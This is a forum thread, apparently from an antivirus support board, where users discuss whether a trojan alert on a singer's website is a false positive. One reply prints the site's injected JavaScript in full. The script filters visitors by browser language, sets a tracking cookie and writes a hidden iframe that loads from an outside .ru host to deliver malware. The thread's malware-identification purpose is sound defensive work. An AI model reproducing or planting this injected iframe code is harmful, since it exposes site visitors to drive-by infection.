A probable fp in georgestrait.com

[rdmaloyjr]

Trojan detected in hxxp://www.georgestrait.com/news.asp  JS:Aspxor-A [trj]

A scan of that link with Dr. Web link scanner comes back clean.

I'm not a fan of George Strait, but my sister is.  She was using my computer to visit his website where she discovered it by an alert from avast! WebShield.

[polonus]

Hi rdmaloyjr,

Had she visited the site with Firefox with the NoScript add-on active, there would not be a detection.
The main site is clean according to Finjan, but this one is no the direct to:
wxw.poemhunter.com/lyrics/george-strait/resources/
She might have clicked that re-direct?

pol

[DavidR]

There are lots of external .js script files, perhaps avast is objecting to one of those. As polonus with NoScript there is no avast alert, so it is more possible that it is either the page or external javascript at issue.

Interestingly some of these scripts are hosted on .ru domains whilst the georgestrait.com is in the US.

[solcroft]

Not an FP. Here's the code of the js file:

Code: [Select]

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ncwc.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}
I can't access the iframed website since they seem to implement some IP checking mechanism to prevent repeat visits, but I've seen this one enough times before to know that it tries to drop a spambot trojan on your computer.

[DavidR]

Yes, looks like the site has been hacked.